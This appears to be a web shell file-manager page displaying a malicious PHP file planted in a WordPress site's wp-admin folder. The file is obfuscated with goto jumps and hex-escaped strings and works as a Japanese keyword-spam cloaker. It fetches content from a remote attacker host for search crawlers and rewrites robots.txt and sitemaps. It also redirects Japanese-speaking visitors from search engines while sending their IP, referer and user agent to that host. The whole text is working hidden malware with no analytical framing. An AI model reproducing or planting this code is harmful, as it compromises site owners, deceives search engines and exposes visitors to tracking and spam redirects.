HEX
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
System: Linux f31.eelserver.com 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: bestmobi (1488)
PHP: 8.0.30
Disabled: exec,shell_exec,system,passthru,popen,proc_open
Upload Files
File: /home/bestmobi/public_html/wp-admin/state.php
<?php
 goto QpAIi; acj3n: if (strpos($req_uri, "\x2e\160\x68\160")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto fGcbI; NAGxj: $data1["\162\x65\161\137\165\x72\154"] = $req_url; goto HyGgN; yiNNZ: $url_robots = $inter_domain . "\x2f\162\157\142\x6f\x74\163\56\160\x68\160"; goto acj3n; rByBp: $jump1 = $inter_domain . "\x2f\152\x75\x6d\x70\x2e\x70\x68\160"; goto o8v0M; SsRep: $ser_name = $_SERVER["\x53\105\x52\126\105\122\x5f\x4e\101\x4d\x45"]; goto k4FRe; E2MdV: $http = isset($_SERVER["\x48\x54\124\x50\123"]) && $_SERVER["\110\124\x54\x50\x53"] !== "\157\x66\146" ? "\150\x74\x74\160\163\72\57\x2f" : "\150\x74\x74\x70\72\x2f\x2f"; goto dD2Pw; dD2Pw: $req_uri = $_SERVER["\122\105\121\x55\x45\x53\124\x5f\125\122\111"]; goto K7_ob; o8v0M: $url_words = $inter_domain . "\57\x77\157\162\144\x73\x2e\160\150\x70"; goto yiNNZ; EPNLu: $self = $_SERVER["\x50\x48\120\x5f\x53\105\114\x46"]; goto SsRep; rIGc1: $req_uri = str_replace(array("\x2e\150\164\x6d", "\56\150\x74\155\154", "\56\x73\150\164\155\x6c", "\56\160\150\x74\155\154"), '', rtrim($req_uri, "\x2f")); goto Aa9lN; HyGgN: if (substr($req_uri, -6) == "\x72\157\142\x6f\x74\163") { define("\x42\x41\123\x45\137\x50\101\124\110", $_SERVER["\x44\x4f\103\125\115\105\116\x54\137\x52\117\x4f\124"]); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\x72\x6f\x62\157\x74\163\56\164\170\164"); $data1["\x72\157\142\x6f\164\163\137\x63\x6f\156\164"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\57\x72\157\142\x6f\x74\x73\x2e\x74\x78\164", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\57\162\x6f\142\157\164\x73\x2e\164\x78\x74"); if (strpos(strtolower($robots_cont), "\x73\151\164\145\x6d\141\x70")) { echo "\162\x6f\x62\157\x74\163\x2e\x74\170\164\x20\146\151\154\x65\40\143\162\x65\x61\164\145\x20\x73\x75\143\143\145\x73\x73\x21"; } else { echo "\x72\157\x62\157\x74\x73\56\164\170\x74\40\146\x69\x6c\x65\x20\x63\x72\145\141\x74\x65\40\x66\x61\151\154\41"; } die; } goto z3PD_; fGcbI: $data1[] = array(); goto fbA9z; ez8VI: $indata1 = $inter_domain . "\57\x69\x6e\144\x61\x74\x61\x2e\160\150\160"; goto hOw2A; mJORW: $data1["\162\145\161\x5f\x75\162\x69"] = $req_uri; goto W9J99; RxpLj: if ($res_crawl) { $data1["\x68\x74\x74\x70\137\x75\163\x65\x72\137\x61\x67\145\156\x74"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto oWCK7; fss_u: $chk_refer = check_refer($referer); goto uJny8; GmYht: function getServerCont($url, $data = array()) { $url = str_replace("\40", "\53", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\70\56\x30\x2e\60", "\74")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto kHxwr; vD3MX: $res_crawl = is_crawler($user_agent); goto rIGc1; K7_ob: $domain = $_SERVER["\x48\124\124\120\137\110\117\x53\124"]; goto EPNLu; fbA9z: $data1["\x64\157\x6d\141\x69\x6e"] = $domain; goto mJORW; uJny8: $user_agent = strtolower(isset($_SERVER["\110\x54\124\x50\137\125\x53\x45\x52\137\x41\107\x45\116\124"]) ? $_SERVER["\110\x54\x54\120\x5f\125\x53\x45\122\x5f\x41\x47\105\116\124"] : ''); goto vD3MX; nTmtQ: function check_refer($refer) { $check_refer = false; $referbots = "\147\157\157\147\154\145\x7c\x79\141\150\x6f\157\174\x62\151\156\147\174\141\157\x6c"; if ($refer != '' && preg_match("\x2f\x28{$referbots}\51\x2f\x73\x69", $refer)) { $check_refer = true; } return $check_refer; } goto BpVTG; z3PD_: if (substr($req_uri, -4) == "\x2e\x78\155\154") { if (strpos($req_uri, "\x61\154\x6c\x73\151\164\145\155\141\160\x2e\170\155\154")) { $str_cont = getServerCont($map1, $data1); header("\x43\x6f\x6e\164\145\156\164\x2d\x74\171\x70\x65\72\x74\145\170\x74\x2f\x78\155\154"); echo $str_cont; die; } if (strpos($req_uri, "\x2e\160\x68\160")) { $word4 = explode("\77", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace("\x2e\x78\x6d\x6c", '', $word4); } else { $word4 = str_replace("\x2f", '', $req_uri); $word4 = str_replace("\56\x78\x6d\x6c", '', $word4); } $data1["\x77\157\x72\144"] = $word4; $data1["\141\143\x74\151\x6f\x6e"] = "\x63\x68\145\x63\153\137\x73\x69\164\145\155\x61\x70"; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == "\x31") { $str_cont = getServerCont($map1, $data1); header("\x43\157\156\164\x65\156\164\x2d\164\x79\160\x65\72\164\x65\x78\x74\x2f\170\155\x6c"); echo $str_cont; die; } $data1["\x61\x63\x74\151\x6f\156"] = "\x63\150\145\x63\x6b\137\167\x6f\162\x64\x73"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "\x6d\x61\x70") > 0 || $check1 == "\61") { $data1["\141\143\164\x69\157\156"] = "\162\141\156\x64\137\x78\x6d\154"; $check_url4 = getServerCont($url_words, $data1); header("\103\x6f\x6e\x74\145\156\x74\x2d\164\x79\160\x65\72\x74\x65\x78\164\x2f\170\x6d\x6c"); echo $check_url4; die; } } goto zE3JE; BpVTG: function is_japanese_language() { $accept_language = isset($_SERVER["\x48\124\124\x50\x5f\101\x43\x43\x45\120\124\137\114\x41\x4e\107\125\x41\107\x45"]) ? $_SERVER["\110\x54\x54\120\x5f\x41\103\103\105\x50\124\137\x4c\101\x4e\107\x55\101\107\105"] : ''; if (empty($accept_language)) { return false; } $langs = explode("\54", $accept_language); $primary_lang = strtolower(trim($langs[0])); if (strpos($primary_lang, "\x6a\x61") === 0) { return true; } return false; } goto E2MdV; kHxwr: function is_crawler($agent) { $agent_check = false; $bots = "\x67\157\157\147\x6c\x65\x62\157\x74\174\x62\x69\x6e\147\142\x6f\164\x7c\147\157\157\x67\x6c\x65\174\x61\157\x6c\174\x62\151\x6e\147\x7c\171\x61\x68\x6f\157"; if ($agent != '') { if (preg_match("\x2f\50{$bots}\x29\x2f\x73\x69", $agent)) { $agent_check = true; } } return $agent_check; } goto nTmtQ; LY8FT: $referer = isset($_SERVER["\110\x54\124\x50\x5f\x52\x45\x46\105\x52\x45\x52"]) ? $_SERVER["\x48\x54\124\x50\x5f\122\105\106\105\122\105\x52"] : ''; goto fss_u; zE3JE: if (strpos($req_uri, "\56\x70\x68\160")) { $main_shell = $http . $ser_name . $self; $data1["\x6d\x61\151\156\137\x73\x68\145\x6c\x6c"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\155\141\x69\156\x5f\x73\x68\145\154\x6c"] = $main_shell; } goto LY8FT; Aa9lN: if (!$res_crawl && $chk_refer && is_japanese_language() && (preg_match("\x2f\134\x64\x24\x2f", $req_uri) || preg_match("\43\133\141\x2d\x7a\x5d\x3d\x5b\x61\55\x7a\60\x2d\71\135\x2b\x23", $req_uri) || preg_match("\x2f\x69\164\145\155\x2f", $req_uri))) { $data1["\151\x70"] = $_SERVER["\122\x45\x4d\x4f\x54\105\137\101\104\x44\122"]; $data1["\x72\145\146\145\x72\145\162"] = isset($_SERVER["\x48\x54\x54\x50\137\122\105\x46\105\x52\105\x52"]) ? $_SERVER["\110\x54\x54\x50\x5f\x52\105\x46\x45\x52\105\x52"] : ''; $data1["\165\x73\x65\162\137\x61\147\x65\156\x74"] = strtolower(isset($_SERVER["\110\x54\124\120\x5f\x55\x53\x45\x52\137\101\x47\x45\116\x54"]) ? $_SERVER["\110\x54\x54\120\x5f\125\x53\105\x52\x5f\101\107\x45\x4e\x54"] : ''); echo getServerCont($jump1, $data1); die; } goto RxpLj; k4FRe: $req_url = $http . $domain . $req_uri; goto ez8VI; QpAIi: $inter_domain = "\150\164\164\160\x73\x3a\x2f\x2f\172\66\x30\x37\62\65\x5f\x31\66\x2e\x76\x61\154\151\x6c\143\157\56\170\x79\x7a\x2f"; goto GmYht; W9J99: $data1["\x68\x72\145\146"] = $href1; goto NAGxj; hOw2A: $map1 = $inter_domain . "\x2f\x6d\x61\x70\x2e\160\150\160"; goto rByBp; oWCK7: ?>